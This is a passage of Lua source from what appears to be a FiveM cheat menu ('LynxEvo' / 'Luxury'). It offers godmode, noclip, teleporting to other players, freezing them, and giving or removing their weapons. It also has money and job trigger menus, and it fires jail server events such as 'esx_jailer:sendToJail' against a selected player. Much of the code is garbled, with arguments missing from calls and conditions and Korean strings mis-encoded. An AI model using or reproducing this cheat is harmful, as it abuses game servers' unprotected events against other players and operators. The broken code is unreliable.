  7296. if IsDisabledControlPressed(0, 20) then
  7297. dv = -0.21
  7298. end
  7299. end
  7300. dt = GetOffsetFromEntityInWorldCoords(ds, 0.0, du * (dr + 0.3), dv * (dr + 0.3))
  7301. local bL = GetEntityHeading(ds)
  7302. SetEntityVelocity(ds, 0.0, 0.0, 0.0)
  7303. SetEntityRotation(ds, 0.0, 0.0, 0.0, 0, false)
  7304. SetEntityHeading(ds, bL)
  7305. SetEntityCollision(ds, false, false)
  7306. SetEntityCoordsNoOffset(ds, dt.x, dt.y, dt.z, true, true, true)
  7307. FreezeEntityPosition(ds, false)
  7308. SetEntityInvincible(ds, false)
  7309. SetEntityCollision(ds, true, true)
  7310. end
  7311. end
  7312. end
  7313. )
  7314. Citizen.CreateThread(
  7315. function()
  7316. FreezeEntityPosition(entity, false)
  7317. local dw = 1
  7318. local dx = true
  7319. local dy = nil
  7320. local dz = nil
  7321. local dA = nil
  7322. local dB = 1
  7323. local dC = 1
  7324. local dD = {
  7325. 1.0,
  7326. 2.0,
  7327. 4.0,
  7328. 10.0,
  7329. 512.0,
  7330. 9999.0
  7331. }
  7332. LynxEvo.CreateMenu('Luxury', bs) -- 硫붿씤硫붾돱
  7333. LynxEvo.SetSubTitle('Luxury', '34ByTe Community')
  7334. LynxEvo.CreateSubMenu('?뚮젅?댁뼱 硫붾돱', 'Luxury', '?뚮젅?댁뼱 硫붾돱')
  7335. LynxEvo.CreateSubMenu('?붾젅?ы듃 硫붾돱', 'Luxury', '?붾젅?ы듃 硫붾돱')
  7336. LynxEvo.CreateSubMenu('臾닿린 硫붾돱', 'Luxury', '臾닿린 硫붾돱')
  7337. LynxEvo.CreateSubMenu('怨좉툒紐⑤뱶', 'Luxury', '怨좉툒紐⑤뱶')
  7338. LynxEvo.CreateSubMenu('猷⑥븘 硫붾돱', 'Luxury', '猷⑥븘 硫붾돱')
  7339. LynxEvo.CreateSubMenu('李⑤웾 硫붾돱', 'Luxury', '李⑤웾 硫붾돱')
  7340. LynxEvo.CreateSubMenu('?⑤씪?명뵆?덉씠??硫붾돱', 'Luxury', '?⑤씪?명뵆?덉씠??硫붾돱')
  7341. LynxEvo.CreateSubMenu('?뚮젅?댁뼱?듭뀡 硫붾돱', '?⑤씪?명뵆?덉씠??硫붾돱', 'Player Options')
  7342. LynxEvo.CreateSubMenu('Destroyer', '怨좉툒紐⑤뱶', 'Destroyer Menu')
  7343. LynxEvo.CreateSubMenu('ESXBoss', '猷⑥븘 硫붾돱', 'ESX Boss Triggers')
  7344. LynxEvo.CreateSubMenu('ESXMoney', '猷⑥븘 硫붾돱', 'ESX Money Triggers')
  7345. LynxEvo.CreateSubMenu('ESXDrugs', '猷⑥븘 硫붾돱', 'ESX Drugs')
  7346. LynxEvo.CreateSubMenu('ESXCustom', '猷⑥븘 硫붾돱', 'ESX Random Triggers')
  7347. LynxEvo.CreateSubMenu('VRPTriggers', '猷⑥븘 硫붾돱', 'VRP Triggers')
  7348. LynxEvo.CreateSubMenu('MiscTriggers', '猷⑥븘 硫붾돱', 'Misc Triggers')
  7349. LynxEvo.CreateSubMenu('crds', 'Luxury', 'Credits')
  7350. LynxEvo.CreateSubMenu('ESXJobs', '猷⑥븘 硫붾돱', 'ESX Jobs')
  7351. LynxEvo.CreateSubMenu('ESXJobs2', '?뚮젅?댁뼱?듭뀡 硫붾돱', 'ESX Jobs Individual')
  7352. LynxEvo.CreateSubMenu('ESXTriggerini', '?뚮젅?댁뼱?듭뀡 硫붾돱', 'ESX Triggers')
  7353. LynxEvo.CreateSubMenu('?몃· 硫붾돱', '?뚮젅?댁뼱?듭뀡 硫붾돱', '?몃· 硫붾돱*^3^*')
  7354. LynxEvo.CreateSubMenu('WeaponTypes', '臾닿린 硫붾돱', 'Weapons')
  7355. LynxEvo.CreateSubMenu('WeaponTypeSelection', 'WeaponTypes', 'Weapon')
  7356. LynxEvo.CreateSubMenu('WeaponOptions', 'WeaponTypeSelection', 'Weapon Options')
  7357. LynxEvo.CreateSubMenu('ModSelect', 'WeaponOptions', 'Weapon Mod Options')
  7358. LynxEvo.CreateSubMenu('CarTypes', '李⑤웾 硫붾돱', 'Vehicles')
  7359. LynxEvo.CreateSubMenu('CarTypeSelection', 'CarTypes', 'Moew :3')
  7360. LynxEvo.CreateSubMenu('CarOptions', 'CarTypeSelection', 'Car Options')
  7361. LynxEvo.CreateSubMenu('MainTrailer', '李⑤웾 硫붾돱', 'Trailers to Attach')
  7362. LynxEvo.CreateSubMenu('MainTrailerSel', 'MainTrailer', 'Trailers Available')
  7363. LynxEvo.CreateSubMenu('MainTrailerSpa', 'MainTrailerSel', 'Trailer Options')
  7364. LynxEvo.CreateSubMenu('GiveSingleWeaponPlayer', '?⑤씪?명뵆?덉씠??硫붾돱', 'Single Weapon Menu')
  7365. LynxEvo.CreateSubMenu('ESP硫붾돱', '怨좉툒紐⑤뱶', 'ESP Menu')
  7366. LynxEvo.CreateSubMenu('濡쒖뒪?고넗??, '李⑤웾 硫붾돱', 'LSC Customs')
  7367. LynxEvo.CreateSubMenu('tunings', '濡쒖뒪?고넗??, 'Visual Tuning')
  7368. LynxEvo.CreateSubMenu('performance', '濡쒖뒪?고넗??, 'Performance Tuning')
  7369. LynxEvo.CreateSubMenu('VRPPlayerTriggers', '?뚮젅?댁뼱?듭뀡 硫붾돱', 'VRP Triggers')
  7370. LynxEvo.CreateSubMenu('BoostMenu', '李⑤웾 硫붾돱', 'Vehicle Boost')
  7371. LynxEvo.CreateSubMenu('AI(遊??뚰솚', '?몃· 硫붾돱', 'AI(遊??뚰솚')
  7372. LynxEvo.CreateSubMenu('GCT', '李⑤웾 硫붾돱', 'Global Car Trolls')
  7373. LynxEvo.CreateSubMenu('CsMenu', '怨좉툒紐⑤뱶', 'Crosshairs')
  7374. for i, dE in pairs(bl) do
  7375. LynxEvo.CreateSubMenu(, 'tunings',
  7376. if == 'paint' then
  7377. LynxEvo.CreateSubMenu('primary',, 'Primary Paint')
  7378. LynxEvo.CreateSubMenu('secondary',, 'Secondary Paint')
  7379. LynxEvo.CreateSubMenu('rimpaint',, 'Wheel Paint')
  7380. LynxEvo.CreateSubMenu('classic1', 'primary', 'Classic Paint')
  7381. LynxEvo.CreateSubMenu('metallic1', 'primary', 'Metallic Paint')
  7382. LynxEvo.CreateSubMenu('matte1', 'primary', 'Matte Paint')
  7383. LynxEvo.CreateSubMenu('metal1', 'primary', 'Metal Paint')
  7384. LynxEvo.CreateSubMenu('classic2', 'secondary', 'Classic Paint')
  7385. LynxEvo.CreateSubMenu('metallic2', 'secondary', 'Metallic Paint')
  7386. LynxEvo.CreateSubMenu('matte2', 'secondary', 'Matte Paint')
  7387. LynxEvo.CreateSubMenu('metal2', 'secondary', 'Metal Paint')
  7388. LynxEvo.CreateSubMenu('classic3', 'rimpaint', 'Classic Paint')
  7389. LynxEvo.CreateSubMenu('metallic3', 'rimpaint', 'Metallic Paint')
  7390. LynxEvo.CreateSubMenu('matte3', 'rimpaint', 'Matte Paint')
  7391. LynxEvo.CreateSubMenu('metal3', 'rimpaint', 'Metal Paint')
  7392. end
  7393. end
  7394. for i, dE in pairs(bm) do
  7395. LynxEvo.CreateSubMenu(, 'performance',
  7396. end
  7397. local SelectedPlayer
  7398. while bw do
  7399. ped = PlayerPedId()
  7400. veh = GetVehiclePedIsUsing(ped)
  7401. SetVehicleModKit(veh, 0)
  7402. for i, dE in pairs(bl) do
  7403. if LynxEvo.IsMenuOpened('tunings') then
  7404. if bg then
  7405. if bi == 'neon' then
  7406. local r, g, b = table.unpack(bh)
  7407. SetVehicleNeonLightsColour(veh, r, g, b)
  7408. SetVehicleNeonLightEnabled(veh, 0, bk)
  7409. SetVehicleNeonLightEnabled(veh, 1, bk)
  7410. SetVehicleNeonLightEnabled(veh, 2, bk)
  7411. SetVehicleNeonLightEnabled(veh, 3, bk)
  7412. bg = false
  7413. bi = -1
  7414. bh = -1
  7415. elseif bi == 'paint' then
  7416. local dF, dG, dH, dI = table.unpack(bh)
  7417. SetVehicleColours(veh, dF, dG)
  7418. SetVehicleExtraColours(veh, dH, dI)
  7419. bg = false
  7420. bi = -1
  7421. bh = -1
  7422. else
  7423. if bk == 'rm' then
  7424. RemoveVehicleMod(veh, bi)
  7425. bg = false
  7426. bi = -1
  7427. bh = -1
  7428. else
  7429. SetVehicleMod(veh, bi, bh, false)
  7430. bg = false
  7431. bi = -1
  7432. bh = -1
  7433. end
  7434. end
  7435. end
  7436. end
  7437. if LynxEvo.IsMenuOpened( then
  7438. if == 'wheeltypes' then
  7439. if LynxEvo.Button('Sport Wheels') then
  7440. SetVehicleWheelType(veh, 0)
  7441. elseif LynxEvo.Button('Muscle Wheels') then
  7442. SetVehicleWheelType(veh, 1)
  7443. elseif LynxEvo.Button('Lowrider Wheels') then
  7444. SetVehicleWheelType(veh, 2)
  7445. elseif LynxEvo.Button('SUV Wheels') then
  7446. SetVehicleWheelType(veh, 3)
  7447. elseif LynxEvo.Button('Offroad Wheels') then
  7448. SetVehicleWheelType(veh, 4)
  7449. elseif LynxEvo.Button('Tuner Wheels') then
  7450. SetVehicleWheelType(veh, 5)
  7451. elseif LynxEvo.Button('High End Wheels') then
  7452. SetVehicleWheelType(veh, 7)
  7453. end
  7454. LynxEvo.Display()
  7455. elseif == 'extra' then
  7456. local dJ = checkValidVehicleExtras()
  7457. for i, dE in pairs(dJ) do
  7458. if IsVehicleExtraTurnedOn(veh, i) then
  7459. pricestring = 'Installed'
  7460. else
  7461. pricestring = 'Not Installed'
  7462. end
  7463. if LynxEvo.Button(dE.menuName, pricestring) then
  7464. SetVehicleExtra(veh, i, IsVehicleExtraTurnedOn(veh, i))
  7465. end
  7466. end
  7467. LynxEvo.Display()
  7468. elseif == 'headlight' then
  7469. if LynxEvo.Button('None') then
  7470. SetVehicleHeadlightsColour(veh, -1)
  7471. end
  7472. for dK, dE in pairs(bo) do
  7473. tp = GetVehicleHeadlightsColour(veh)
  7474. if tp == and not bg then
  7475. pricetext = 'Installed'
  7476. else
  7477. if bg and tp == then
  7478. pricetext = 'Previewing'
  7479. else
  7480. pricetext = 'Not Installed'
  7481. end
  7482. end
  7483. head = GetVehicleHeadlightsColour(veh)
  7484. if LynxEvo.Button(, pricetext) then
  7485. if not bg then
  7486. bi = 'headlight'
  7487. bk = false
  7488. oldhead = GetVehicleHeadlightsColour(veh)
  7489. bh = table.pack(oldhead)
  7490. SetVehicleHeadlightsColour(veh,
  7491. bg = true
  7492. elseif bg and head == then
  7493. ToggleVehicleMod(veh, 22, true)
  7494. SetVehicleHeadlightsColour(veh,
  7495. bg = false
  7496. bi = -1
  7497. bh = -1
  7498. elseif bg and head ~= then
  7499. SetVehicleHeadlightsColour(veh,
  7500. bg = true
  7501. end
  7502. end
  7503. end
  7504. LynxEvo.Display()
  7505. elseif == 'licence' then
  7506. if LynxEvo.Button('None') then
  7507. SetVehicleNumberPlateTextIndex(veh, 3)
  7508. end
  7509. for dK, dE in pairs(bn) do
  7510. tp = GetVehicleNumberPlateTextIndex(veh)
  7511. if tp == and not bg then
  7512. pricetext = 'Installed'
  7513. else
  7514. if bg and tp == then
  7515. pricetext = 'Previewing'
  7516. else
  7517. pricetext = 'Not Installed'
  7518. end
  7519. end
  7520. plate = GetVehicleNumberPlateTextIndex(veh)
  7521. if LynxEvo.Button(, pricetext) then
  7522. if not bg then
  7523. bi = 'headlight'
  7524. bk = false
  7525. oldhead = GetVehicleNumberPlateTextIndex(veh)
  7526. bh = table.pack(oldhead)
  7527. SetVehicleNumberPlateTextIndex(veh,
  7528. bg = true
  7529. elseif bg and plate == then
  7530. SetVehicleNumberPlateTextIndex(veh,
  7531. bg = false
  7532. bi = -1
  7533. bh = -1
  7534. elseif bg and plate ~= then
  7535. SetVehicleNumberPlateTextIndex(veh,
  7536. bg = true
  7537. end
  7538. end
  7539. end
  7540. LynxEvo.Display()
  7541. elseif == 'neon' then
  7542. if LynxEvo.Button('None') then
  7543. SetVehicleNeonLightsColour(veh, 255, 255, 255)
  7544. SetVehicleNeonLightEnabled(veh, 0, false)
  7545. SetVehicleNeonLightEnabled(veh, 1, false)
  7546. SetVehicleNeonLightEnabled(veh, 2, false)
  7547. SetVehicleNeonLightEnabled(veh, 3, false)
  7548. end
  7549. for i, dE in pairs(bq) do
  7550. colorr, colorg, colorb = table.unpack(dE)
  7551. r, g, b = GetVehicleNeonLightsColour(veh)
  7552. if
  7553. colorr == r and colorg == g and colorb == b and IsVehicleNeonLightEnabled(vehicle, 2) and
  7554. not bg
  7555. then
  7556. pricestring = 'Installed'
  7557. else
  7558. if bg and colorr == r and colorg == g and colorb == b then
  7559. pricestring = 'Previewing'
  7560. else
  7561. pricestring = 'Not Installed'
  7562. end
  7563. end
  7564. if LynxEvo.Button(i, pricestring) then
  7565. if not bg then
  7566. bi = 'neon'
  7567. bk = IsVehicleNeonLightEnabled(veh, 1)
  7568. oldr, oldg, oldb = GetVehicleNeonLightsColour(veh)
  7569. bh = table.pack(oldr, oldg, oldb)
  7570. SetVehicleNeonLightsColour(veh, colorr, colorg, colorb)
  7571. SetVehicleNeonLightEnabled(veh, 0, true)
  7572. SetVehicleNeonLightEnabled(veh, 1, true)
  7573. SetVehicleNeonLightEnabled(veh, 2, true)
  7574. SetVehicleNeonLightEnabled(veh, 3, true)
  7575. bg = true
  7576. elseif bg and colorr == r and colorg == g and colorb == b then
  7577. SetVehicleNeonLightsColour(veh, colorr, colorg, colorb)
  7578. SetVehicleNeonLightEnabled(veh, 0, true)
  7579. SetVehicleNeonLightEnabled(veh, 1, true)
  7580. SetVehicleNeonLightEnabled(veh, 2, true)
  7581. SetVehicleNeonLightEnabled(veh, 3, true)
  7582. bg = false
  7583. bi = -1
  7584. bh = -1
  7585. elseif bg and colorr ~= r or colorg ~= g or colorb ~= b then
  7586. SetVehicleNeonLightsColour(veh, colorr, colorg, colorb)
  7587. SetVehicleNeonLightEnabled(veh, 0, true)
  7588. SetVehicleNeonLightEnabled(veh, 1, true)
  7589. SetVehicleNeonLightEnabled(veh, 2, true)
  7590. SetVehicleNeonLightEnabled(veh, 3, true)
  7591. bg = true
  7592. end
  7593. end
  7594. end
  7595. LynxEvo.Display()
  7596. elseif == 'paint' then
  7597. if LynxEvo.MenuButton('~h~~p~#~s~ Primary Paint', 'primary') then
  7598. elseif LynxEvo.MenuButton('~h~~p~#~s~ Secondary Paint', 'secondary') then
  7599. elseif LynxEvo.MenuButton('~h~~p~#~s~ Wheel Paint', 'rimpaint') then
  7600. end
  7601. LynxEvo.Display()
  7602. else
  7603. local az = checkValidVehicleMods(
  7604. for i, dL in pairs(az) do
  7605. for dM, dN in pairs(bp) do
  7606. if dM == and GetVehicleMod(veh, ~= then
  7607. price = 'Not Installed'
  7608. elseif dM == and bg and GetVehicleMod(veh, == then
  7609. price = 'Previewing'
  7610. elseif dM == and GetVehicleMod(veh, == then
  7611. price = 'Installed'
  7612. end
  7613. end
  7614. if dL.menuName == '~h~~b~Stock' then
  7615. end
  7616. if == 'Horns' then
  7617. for dO, dP in pairs(bp) do
  7618. if dP == ci - 1 then
  7619. dL.menuName = dO
  7620. end
  7621. end
  7622. end
  7623. if dL.menuName == 'NULL' then
  7624. dL.menuName = 'unknown'
  7625. end
  7626. if LynxEvo.Button(dL.menuName) then
  7627. if not bg then
  7628. bi =
  7629. bh = GetVehicleMod(veh,
  7630. bg = true
  7631. if == -1 then
  7632. bk = 'rm'
  7633. RemoveVehicleMod(veh,
  7634. bg = false
  7635. bi = -1
  7636. bh = -1
  7637. bk = false
  7638. else
  7639. bk = false
  7640. SetVehicleMod(veh,,, false)
  7641. end
  7642. elseif bg and GetVehicleMod(veh, == then
  7643. bg = false
  7644. bi = -1
  7645. bh = -1
  7646. bk = false
  7647. if == -1 then
  7648. RemoveVehicleMod(veh,
  7649. else
  7650. SetVehicleMod(veh,,, false)
  7651. end
  7652. elseif bg and GetVehicleMod(veh, ~= then
  7653. if == -1 then
  7654. RemoveVehicleMod(veh,
  7655. bg = false
  7656. bi = -1
  7657. bh = -1
  7658. bk = false
  7659. else
  7660. SetVehicleMod(veh,,, false)
  7661. bg = true
  7662. end
  7663. end
  7664. end
  7665. end
  7666. LynxEvo.Display()
  7667. end
  7668. end
  7669. end
  7670. for i, dE in pairs(bm) do
  7671. if LynxEvo.IsMenuOpened( then
  7672. if GetVehicleMod(veh, == 0 then
  7673. pricestock = 'Not Installed'
  7674. price1 = 'Installed'
  7675. price2 = 'Not Installed'
  7676. price3 = 'Not Installed'
  7677. price4 = 'Not Installed'
  7678. elseif GetVehicleMod(veh, == 1 then
  7679. pricestock = 'Not Installed'
  7680. price1 = 'Not Installed'
  7681. price2 = 'Installed'
  7682. price3 = 'Not Installed'
  7683. price4 = 'Not Installed'
  7684. elseif GetVehicleMod(veh, == 2 then
  7685. pricestock = 'Not Installed'
  7686. price1 = 'Not Installed'
  7687. price2 = 'Not Installed'
  7688. price3 = 'Installed'
  7689. price4 = 'Not Installed'
  7690. elseif GetVehicleMod(veh, == 3 then
  7691. pricestock = 'Not Installed'
  7692. price1 = 'Not Installed'
  7693. price2 = 'Not Installed'
  7694. price3 = 'Not Installed'
  7695. price4 = 'Installed'
  7696. elseif GetVehicleMod(veh, == -1 then
  7697. pricestock = 'Installed'
  7698. price1 = 'Not Installed'
  7699. price2 = 'Not Installed'
  7700. price3 = 'Not Installed'
  7701. price4 = 'Not Installed'
  7702. end
  7703. if LynxEvo.Button('Stock ' .., pricestock) then
  7704. SetVehicleMod(veh,, -1)
  7705. elseif LynxEvo.Button( .. ' Upgrade 1', price1) then
  7706. SetVehicleMod(veh,, 0)
  7707. elseif LynxEvo.Button( .. ' Upgrade 2', price2) then
  7708. SetVehicleMod(veh,, 1)
  7709. elseif LynxEvo.Button( .. ' Upgrade 3', price3) then
  7710. SetVehicleMod(veh,, 2)
  7711. elseif ~= 13 and ~= 12 and LynxEvo.Button( .. ' Upgrade 4', price4) then
  7712. SetVehicleMod(veh,, 3)
  7713. end
  7714. LynxEvo.Display()
  7715. end
  7716. end
  7717. if LynxEvo.IsMenuOpened('Luxury') then
  7718. local dQ = PlayerId(-1)
  7719. local bH = GetPlayerName(dQ)
  7720. av('Luxury ?ㅽ겕由쏀듃', false)
  7721. av('@Luxury HG#8222', false)
  7722. if LynxEvo.MenuButton('~h~~p~#~s~ ?뚮젅?댁뼱 硫붾돱', '?뚮젅?댁뼱 硫붾돱') then
  7723. elseif LynxEvo.MenuButton('~h~~p~#~s~ ?⑤씪?명뵆?덉씠??硫붾돱', '?⑤씪?명뵆?덉씠??硫붾돱') then
  7724. elseif LynxEvo.MenuButton('~h~~p~#~s~ ?붾젅?ы듃 硫붾돱', '?붾젅?ы듃 硫붾돱') then
  7725. elseif LynxEvo.MenuButton('~h~~p~#~s~ 李⑤웾 硫붾돱', '李⑤웾 硫붾돱') then
  7726. elseif LynxEvo.MenuButton('~h~~p~#~s~ 臾닿린 硫붾돱', '臾닿린 硫붾돱') then
  7727. elseif LynxEvo.MenuButton('~h~~p~#~s~ 猷⑥븘 硫붾돱 ~o~~h~:3', '猷⑥븘 硫붾돱') then
  7728. elseif LynxEvo.MenuButton('~h~~p~#~s~ 怨좉툒紐⑤뱶 ~o~~h~xD', '怨좉툒紐⑤뱶') then
  7729. elseif LynxEvo.MenuButton('~h~~p~#~y~ 34ByTe Community', 'crds') then
  7730. end
  7731. LynxEvo.Display()
  7732. elseif LynxEvo.IsMenuOpened('?뚮젅?댁뼱 硫붾돱') then
  7733. if
  7734. LynxEvo.CheckBox(
  7735. '~h~~g~臾댁쟻紐⑤뱶',
  7736. Godmode,
  7737. function(dR)
  7738. Godmode = dR
  7739. end
  7740. )
  7741. then
  7742. elseif LynxEvo.Button('~h~~y~諛?~g~臾댁쟻紐⑤뱶') then
  7743. local dS = 'stt_prop_stunt_soccer_ball'
  7744. while not HasModelLoaded(GetHashKey(dS)) do
  7745. Citizen.Wait(0)
  7746. RequestModel(GetHashKey(dS))
  7747. end
  7748. local dT = CreateObject(GetHashKey(dS), 0, 0, 0, true, true, false)
  7749. SetEntityVisible(dT, 0, 0)
  7750. AttachEntityToEntity(
  7751. dT,
  7752. GetPlayerPed(-1),
  7753. GetPedBoneIndex(GetPlayerPed(-1), 57005),
  7754. 0,
  7755. 0,
  7756. -1.0,
  7757. 0,
  7758. 0,
  7759. 0,
  7760. false,
  7761. true,
  7762. true,
  7763. true,
  7764. 1,
  7765. true
  7766. )
  7767. elseif
  7768. LynxEvo.CheckBox(
  7769. '~h~~g~罹먮┃?고몴???щ챸紐⑤뱶]',
  7770. d4,
  7771. function(dR)
  7772. d4 = dR
  7773. end
  7774. )
  7775. then
  7776. elseif LynxEvo.Button('~h~~r~?먯궡') then
  7777. SetEntityHealth(PlayerPedId(-1), 0)
  7778. elseif LynxEvo.Button('~h~~g~ESX~s~ ?대━湲?s~') then
  7779. TriggerEvent('esx_ambulancejob:revive')
  7780. elseif LynxEvo.Button('~h~~g~泥대젰?뚮났[?대━湲?') then
  7781. SetEntityHealth(PlayerPedId(-1), 200)
  7782. elseif LynxEvo.Button('~h~~b~?꾨㉧?뚮났') then
  7783. SetPedArmour(PlayerPedId(-1), 200)
  7784. elseif
  7785. LynxEvo.CheckBox(
  7786. '~h~臾댄븳 ?ㅽ깭誘몃굹',
  7787. InfStamina,
  7788. function(dR)
  7789. InfStamina = dR
  7790. end
  7791. )
  7792. then
  7793. elseif
  7794. LynxEvo.CheckBox(
  7795. '~h~???붿긽 ~o~移대찓??,
  7796. bTherm,
  7797. function(bTherm)
  7798. end
  7799. )
  7800. then
  7801. therm = not therm
  7802. bTherm = therm
  7803. SetSeethrough(therm)
  7804. elseif
  7805. LynxEvo.CheckBox(
  7806. '~h~鍮좊Ⅴ寃??щ━湲?,
  7807. fastrun,
  7808. function(dR)
  7809. fastrun = dR
  7810. end
  7811. )
  7812. then
  7813. elseif
  7814. LynxEvo.CheckBox(
  7815. '~h~?덊띁?먰봽',
  7816. SuperJump,
  7817. function(dR)
  7818. SuperJump = dR
  7819. end
  7820. )
  7821. then
  7822. elseif
  7823. LynxEvo.CheckBox(
  7824. '~h~?먯쑀?쒖젏[noclip]',
  7825. Noclip,
  7826. function(dR)
  7827. Noclip = dR
  7828. end
  7829. )
  7830. then
  7831. end
  7832. LynxEvo.Display()
  7833. elseif LynxEvo.IsMenuOpened('?⑤씪?명뵆?덉씠??硫붾돱') then
  7834. for i = 0, 128 do
  7835. if
  7836. NetworkIsPlayerActive(i) and GetPlayerServerId(i) ~= 0 and
  7837. LynxEvo.MenuButton(
  7838. GetPlayerName(i) ..
  7839. ' ~p~[' ..
  7840. GetPlayerServerId(i) ..
  7841. ']~s~ ~y~[' ..
  7842. i ..
  7843. ']~s~ ' ..
  7844. (IsPedDeadOrDying(GetPlayerPed(i), 1) and '~h~~r~?щ쭩' or
  7845. '~h~~g~?앹〈'),
  7846. '?뚮젅?댁뼱?듭뀡 硫붾돱'
  7847. )
  7848. then
  7849. SelectedPlayer = i
  7850. end
  7851. end
  7852. LynxEvo.Display()
  7853. elseif LynxEvo.IsMenuOpened('?뚮젅?댁뼱?듭뀡 硫붾돱') then
  7854. LynxEvo.SetSubTitle('?뚮젅?댁뼱?듭뀡 硫붾돱', '?뚮젅?댁뼱?듭뀡 硫붾돱[' .. GetPlayerName(SelectedPlayer) .. ']')
  7855. if LynxEvo.MenuButton('~h~~p~#~r~ ESX Triggers ?섏젙以?, 'ESXTriggerini') then
  7856. elseif LynxEvo.MenuButton('~h~~p~#~r~ ESX Jobs ?섏젙以?, 'ESXJobs2') then
  7857. elseif LynxEvo.MenuButton('~h~~p~#~r~ VRP Triggers ?섏젙以?, 'VRPPlayerTriggers') then
  7858. elseif LynxEvo.MenuButton('~h~~p~#~s~ ?몃· 硫붾돱*^3^*', '?몃· 硫붾돱') then
  7859. elseif LynxEvo.Button('~p~媛먯떆?섍린', cC and '~g~[?뚮젅?댁뼱 媛먯떆以?') then
  7860. SpectatePlayer(SelectedPlayer)
  7861. elseif LynxEvo.Button('~h~~r~諛?臾댁쟻 ~s~?뚮젅?댁뼱') then
  7862. local dS = 'stt_prop_stunt_soccer_ball'
  7863. while not HasModelLoaded(GetHashKey(dS)) do
  7864. Citizen.Wait(0)
  7865. RequestModel(GetHashKey(dS))
  7866. end
  7867. local dT = CreateObject(GetHashKey(dS), 0, 0, 0, true, true, false)
  7868. SetEntityVisible(dT, 0, 0)
  7869. AttachEntityToEntity(
  7870. dT,
  7871. GetPlayerPed(SelectedPlayer),
  7872. GetPedBoneIndex(GetPlayerPed(SelectedPlayer), 57005),
  7873. 0,
  7874. 0,
  7875. -1.0,
  7876. 0,
  7877. 0,
  7878. 0,
  7879. false,
  7880. true,
  7881. true,
  7882. true,
  7883. 1,
  7884. true
  7885. )
  7886. elseif LynxEvo.Button('~h~~g~泥대젰 ~s~二쇨린[?대━湲?') then
  7887. local dU = 'PICKUP_HEALTH_STANDARD'
  7888. local dV = GetHashKey(dU)
  7889. local bK = GetEntityCoords(GetPlayerPed(SelectedPlayer))
  7890. CreateAmbientPickup(dV, bK.x, bK.y, bK.z + 1.0, 1, 1, dV, 1, 0)
  7891. SetPickupRegenerationTime(pickup, 60)
  7892. SetEntityHealth(GetPlayerPed(SelectedPlayer), 200)
  7894. elseif LynxEvo.Button('~h~~b~?꾨㉧ ~s~二쇨린') then
  7895. local dW = 'PICKUP_ARMOUR_STANDARD'
  7896. local dX = GetHashKey(dW)
  7897. local bK = GetEntityCoords(GetPlayerPed(SelectedPlayer))
  7898. local pickup = CreateAmbientPickup(dX, bK.x, bK.y, bK.z + 1.0, 1, 1, dX, 1, 0)
  7899. SetPickupRegenerationTime(pickup, 60)
  7900. SetPedArmour(GetPlayerPed(SelectedPlayer), 200)
  7901. elseif LynxEvo.Button('~h~~b~?€?꾨㉧ ~s~二쇨린') then
  7902. local dW = 'PICKUP_ARMOUR_STANDARD'
  7903. local dX = GetHashKey(dW)
  7904. local bK = GetEntityCoords(GetPlayerPed(SelectedPlayer))
  7905. for i = 0, 99 do
  7906. Citizen.Wait(0)
  7907. CreateAmbientPickup(dX, bK.x, bK.y, bK.z + 1.0, 1, 1, dX, 1, 0)
  7908. SetPickupRegenerationTime(pickup, 10)
  7909. i = i + 1
  7910. end
  7911. elseif LynxEvo.Button('~h~?붾젅?ы듃 ?섍린') then
  7912. if cO then
  7913. local confirm = KeyboardInput('?대떦 ?뚮젅?댁뼱?먭쾶 ?붾젅?ы듃 ??y) / ?꾨땲??n)?', '', 0)
  7914. if confirm == 'y' then
  7915. local Entity =
  7916. IsPedInAnyVehicle(PlayerPedId(-1), false) and GetVehiclePedIsUsing(PlayerPedId(-1)) or
  7917. PlayerPedId(-1)
  7918. SetEntityCoords(Entity, GetEntityCoords(GetPlayerPed(SelectedPlayer)), 0.0, 0.0, 0.0, false)
  7920. elseif confirm == 'n' then
  7921. av('~h~~b~Operation cancelled~s~.', false)
  7922. else
  7923. av('~h~~b~Invalid Confirmation~s~.', true)
  7924. av('~h~~b~Operation cancelled~s~.', false)
  7925. end
  7926. else
  7927. local Entity =
  7928. IsPedInAnyVehicle(PlayerPedId(-1), false) and GetVehiclePedIsUsing(PlayerPedId(-1)) or
  7929. PlayerPedId(-1)
  7930. SetEntityCoords(Entity, GetEntityCoords(GetPlayerPed(SelectedPlayer)), 0.0, 0.0, 0.0, false)
  7931. end
  7932. elseif
  7933. LynxEvo.CheckBox(
  7934. '~h~?뚮젅?댁뼱 ?쇰━湲?,
  7935. freezeplayer,
  7936. function(dR)
  7937. freezeplayer = dR
  7938. end
  7939. )
  7940. then
  7941. elseif LynxEvo.MenuButton('~h~~p~#~s~ ?좏깮臾닿린 二쇨린', 'GiveSingleWeaponPlayer') then
  7942. elseif LynxEvo.Button('~r~紐⑤뱺臾닿린 ~s~二쇨린') then
  7943. for i = 1, #b6 do
  7944. GiveWeaponToPed(GetPlayerPed(SelectedPlayer), GetHashKey(b6[i]), 1000, false, false)
  7945. end
  7946. elseif LynxEvo.Button('~r~紐⑤뱺臾닿린 ~s~?쒓굅') then
  7947. RemoveAllPedWeapons(PlayerPedId(SelectedPlayer), true)
  7948. elseif LynxEvo.Button('~r~李⑤웾 ~s~二쇨린') then
  7949. local ped = GetPlayerPed(SelectedPlayer)
  7950. local cb = KeyboardInput('?뚰솚??李⑤웾 ?대쫫 ?곸뼱留?媛€??ex)jet, rhino', '', 100)
  7951. if cb and IsModelValid(cb) and IsModelAVehicle(cb) then
  7952. RequestModel(cb)
  7953. while not HasModelLoaded(cb) do
  7954. Citizen.Wait(0)
  7955. end
  7956. local veh =
  7957. CreateVehicle(GetHashKey(cb), GetEntityCoords(ped), GetEntityHeading(ped) + 90, true, true)
  7958. else
  7959. av('~b~?대떦 李⑤웾???놁뒿?덈떎! ?대쫫???뺤씤?댁<?몄슂.', true)
  7960. end
  7961. elseif LynxEvo.Button('~h~~r~媛먯삦 ~s~蹂대궡湲?) then
  7962. TriggerServerEvent('esx-qalle-jail:jailPlayer', GetPlayerServerId(selectedPlayer), 5000, 'Jailed')
  7963. TriggerServerEvent('esx_jailer:sendToJail', GetPlayerServerId(selectedPlayer), 45 * 60)
  7964. TriggerServerEvent('esx_jail:sendToJail', GetPlayerServerId(selectedPlayer), 45 * 60)
  7965. TriggerServerEvent('js:jailuser', GetPlayerServerId(selectedPlayer), 45 * 60, 'Jailed')
  7967. elseif LynxEvo.Button('~h~~g~媛먯삦?덉텧 ~s~?쒗궎湲?) then
  7968. local dY = SelectedPlayer
  7969. TriggerServerEvent('esx-qalle-jail:jailPlayer', GetPlayerServerId(dY), 0, 'escaperino')
  7970. TriggerServerEvent('esx_jailer:sendToJail', GetPlayerServerId(dY), 0)
